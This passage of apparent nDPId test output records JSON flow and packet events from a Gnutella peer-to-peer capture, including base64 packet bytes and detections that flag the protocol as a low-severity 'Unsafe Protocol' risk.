-00446{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":286,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":67,"flow_packet_id":2,"flow_last_seen":68368,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":68368,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsAqgAAEAGVIJ08aKiCgACDz09xDIAcUgB9bSpG2AS\/\/+LwQAAAgQFtA=="} 
-00436{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":287,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":67,"flow_packet_id":3,"flow_last_seen":68368,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":68368,"pkt":"UlQAEjUCCAAn5uVZCABFAAAobmNAAIAGaMoKAAIPdPGiosQyPT31tKkbAHFIAlAQ+vCojQAA"} -00756{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":288,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":68108,"flow_last_seen":68372,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":601,"flow_tot_l4_payload_len":601,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":68372,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"116.241.162.162","src_port":50226,"dst_port":15677,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00436{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":290,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":69,"flow_packet_id":2,"flow_last_seen":68425,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":68425,"pkt":"CAAn5uVZUlQAEjUCCABFAAAoAqoAAP8GHcZv8R9gCgACDzgwxDQAAAAAU1SN+lAUAAA2vQAA"} 
-00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":298,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":69,"flow_packet_id":3,"flow_last_seen":68935,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":68935,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0KIpAAIAGNtoKAAIPb\/EfYMQ0ODBTVI35AAAAAIAC+vD7DAAAAgQFtAEDAwgBAQQC"} -00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":299,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":2,"flow_last_seen":69076,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":69076,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0ZdpAAIAGUVsKAAIPtpuA5MQoDLg79XydAAAAAIAC+vCnHQAAAgQFtAEDAwgBAQQC"} -00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":300,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":2,"flow_last_seen":69076,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":69076,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0d8NAAIAGrlMKAAIPcfxWosQp1q4KULlcAAAAAIAC+vBA7QAAAgQFtAEDAwgBAQQC"} -00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":301,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":2,"flow_last_seen":69076,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":69076,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0FThAAIAG3SkKAAIPUMGrksQm0jCYt6bIAAAAAIAC+vCV5QAAAgQFtAEDAwgBAQQC"} 
-00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":302,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":2,"flow_last_seen":69076,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":69076,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0EU9AAIAGi6AKAAIPWmf3XsQq5qXgntCpAAAAAIAC+vC6MQAAAgQFtAEDAwgBAQQC"} -00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":303,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":2,"flow_last_seen":69076,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":69076,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0Co1AAIAGJkcKAAIPfPRA7cQnEmB1c07JAAAAAIAC+vAPawAAAgQFtAEDAwgBAQQC"} -00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":304,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":2,"flow_last_seen":69092,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":69092,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0gY9AAIAGBqAKAAIPwXmlDMQr2FBBRhZnAAAAAIAC+vANYQAAAgQFtAEDAwgBAQQC"} -00556{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":306,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":69141,"flow_last_seen":69141,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":69141,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"182.155.242.225","src_port":50232,"dst_port":15068,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":306,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":73,"flow_packet_id":1,"flow_last_seen":69141,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":69141,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0LcBAAIAGF3gKAAIPtpvy4cQ4Otw6vMh+AAAAAIAC+vC8QwAAAgQFtAEDAwgBAQQC"} -00553{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":307,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":69141,"flow_last_seen":69141,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":69141,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"1.163.14.246","src_port":50233,"dst_port":12854,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":307,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":74,"flow_packet_id":1,"flow_last_seen":69141,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":69141,"pkt":"UlQAEjUCCAAn5uVZCABFAAA01LRAAIAGCWgKAAIPAaMO9sQ5MjZr2Fv\/AAAAAIAC+vCZMAAAAgQFtAEDAwgBAQQC"} 
-00553{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":308,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":69142,"flow_last_seen":69142,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":69142,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"66.189.28.17","src_port":50234,"dst_port":16269,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":308,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":75,"flow_packet_id":1,"flow_last_seen":69142,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":69142,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0VPxAAIAGOusKAAIPQr0cEcQ6P42S8gLxAAAAAIAC+vBvlwAAAgQFtAEDAwgBAQQC"} -00552{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":309,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":69142,"flow_last_seen":69142,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":69142,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"45.88.118.70","src_port":50235,"dst_port":6906,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":309,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":76,"flow_packet_id":1,"flow_last_seen":69142,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":69142,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0AgNAAIAGSRQKAAIPLVh2RsQ7GvpGaqL3AAAAAIAC+vD72gAAAgQFtAEDAwgBAQQC"} -00553{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":310,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":69142,"flow_last_seen":69142,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":69142,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"93.29.135.209","src_port":50236,"dst_port":6346,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":310,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":77,"flow_packet_id":1,"flow_last_seen":69142,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":69142,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0Z6pAAIAGohwKAAIPXR2H0cQ8GMo64wwuAAAAAIAC+vBfCgAAAgQFtAEDAwgBAQQC"} 
-00555{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":311,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":69142,"flow_last_seen":69142,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":69142,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"88.123.202.175","src_port":50237,"dst_port":37910,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":311,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":78,"flow_packet_id":1,"flow_last_seen":69142,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":69142,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0lydAAIAGNGMKAAIPWHvKr8Q9lBZfEvXQAAAAAIAC+vCXrgAAAgQFtAEDAwgBAQQC"} -00446{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":312,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":77,"flow_packet_id":2,"flow_last_seen":69169,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":69169,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsAq8AAEAGhyBdHYfRCgACDxjKxDwAczwBOuMML2AS\/\/9GjAAAAgQFtA=="} -00436{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":313,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":77,"flow_packet_id":3,"flow_last_seen":69169,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":69169,"pkt":"UlQAEjUCCAAn5uVZCABFAAAoZ6tAAIAGoicKAAIPXR2H0cQ8GMo64wwvAHM8AlAQ+vBjWAAA"} 
-00752{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":314,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":69142,"flow_last_seen":69174,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":302,"flow_tot_l4_payload_len":302,"flow_avg_l4_payload_len":75,"midstream":0,"thread_ts_msec":69174,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"93.29.135.209","src_port":50236,"dst_port":6346,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":316,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":76,"flow_packet_id":2,"flow_last_seen":69182,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":69182,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsArEAAEAGyG4tWHZGCgACDxr6xDsAdDYBRmqi+GAS\/\/\/pWwAAAgQFtA=="} -00436{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":317,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":76,"flow_packet_id":3,"flow_last_seen":69182,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":69182,"pkt":"UlQAEjUCCAAn5uVZCABFAAAoAgRAAIAGSR8KAAIPLVh2RsQ7GvpGaqL4AHQ2AlAQ+vAGKAAA"} 
-00752{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":318,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":69142,"flow_last_seen":69182,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":598,"flow_tot_l4_payload_len":598,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":69182,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"45.88.118.70","src_port":50235,"dst_port":6906,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00446{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":327,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":3,"flow_last_seen":69360,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":69360,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsArgAAEAG3qdZSzQTCgACD7O6xBEAXroBd2GZhGAS\/\/+7lwAAAgQFtA=="} -00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":328,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":3,"flow_last_seen":69360,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":69360,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsArkAAEAG56stQVcYCgACDz9JxBAAXcABhPHErWAS\/\/\/6VgAAAgQFtA=="} 
-00446{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":329,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":3,"flow_last_seen":69360,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":69360,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsAroAAEAG+PjPJqPkCgACDxp6xA8AYK4B6qFHeGAS\/\/9Z9wAAAgQFtA=="} -00446{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":330,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":3,"flow_last_seen":69360,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":69360,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsArsAAEAG2+NQjD+TCgACD3NpxA4AX7QBeWsMs2AS\/\/+J8QAAAgQFtA=="} -00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":331,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":73,"flow_packet_id":2,"flow_last_seen":69360,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":69360,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsArwAAEAGwoS2m\/LhCgACDzrcxDgAdioBOrzIf2AS\/\/+1wgAAAgQFtA=="} -00437{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":332,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":73,"flow_packet_id":3,"flow_last_seen":69360,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":69360,"pkt":"UlQAEjUCCAAn5uVZCABFAAAoLcFAAIAGF4MKAAIPtpvy4cQ4Otw6vMh\/AHYqAlAQ+vDSjgAA"} 
-00756{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":333,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":69141,"flow_last_seen":69361,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":601,"flow_tot_l4_payload_len":601,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":69361,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"182.155.242.225","src_port":50232,"dst_port":15068,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":343,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":65,"flow_packet_id":2,"flow_last_seen":70110,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":70110,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0UtFAAIAGDgYKAAIPTn0\/YcQwGMq9KdLlAAAAAIAC+vBtKAAAAgQFtAEDAwgBAQQC"} -00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":344,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":62,"flow_packet_id":2,"flow_last_seen":70110,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":70110,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0faJAAIAGiKUKAAIPO2itBcQtwyRMUgplAAAAAIAC+vChmQAAAgQFtAEDAwgBAQQC"} 
-00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":345,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":64,"flow_packet_id":2,"flow_last_seen":70110,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":70110,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0R01AAIAGN+QKAAIPdqf43MQv9oQzn2SqAAAAAIAC+vCljgAAAgQFtAEDAwgBAQQC"} -00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":346,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":66,"flow_packet_id":2,"flow_last_seen":70110,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":70110,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0+zdAAIAGNBgKAAIPbdJRk8QxYOCX52ZFAAAAAIAC+vCFbAAAAgQFtAEDAwgBAQQC"} -00555{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":347,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":70170,"flow_last_seen":70170,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":70170,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"124.218.41.253","src_port":50238,"dst_port":59144,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":347,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":79,"flow_packet_id":1,"flow_last_seen":70170,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":70170,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0KcZAAIAGHhgKAAIPfNop\/cQ+5wgF3IcnAAAAAIAC+vCI7gAAAgQFtAEDAwgBAQQC"} 
-00552{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":348,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":70171,"flow_last_seen":70171,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":70171,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"112.105.52.2","src_port":50239,"dst_port":6384,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":348,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":80,"flow_packet_id":1,"flow_last_seen":70171,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":70171,"pkt":"UlQAEjUCCAAn5uVZCABFAAA01kJAAIAGdAcKAAIPcGk0AsQ\/GPASVmSCAAAAAIAC+vBvnQAAAgQFtAEDAwgBAQQC"} -00554{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":349,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":70171,"flow_last_seen":70171,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":70171,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"36.237.10.152","src_port":50240,"dst_port":21293,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":349,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":81,"flow_packet_id":1,"flow_last_seen":70171,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":70171,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0Rm9AAIAGeMEKAAIPJO0KmMRAUy2fhJtvAAAAAIAC+vDmKQAAAgQFtAEDAwgBAQQC"} -00554{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":350,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":70171,"flow_last_seen":70171,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":70171,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"98.18.172.208","src_port":50241,"dst_port":63172,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":350,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":82,"flow_packet_id":1,"flow_last_seen":70171,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":70171,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0A95AAIAG2\/QKAAIPYhKs0MRB9sQLj4LfAAAAAIAC+vAPuQAAAgQFtAEDAwgBAQQC"} 
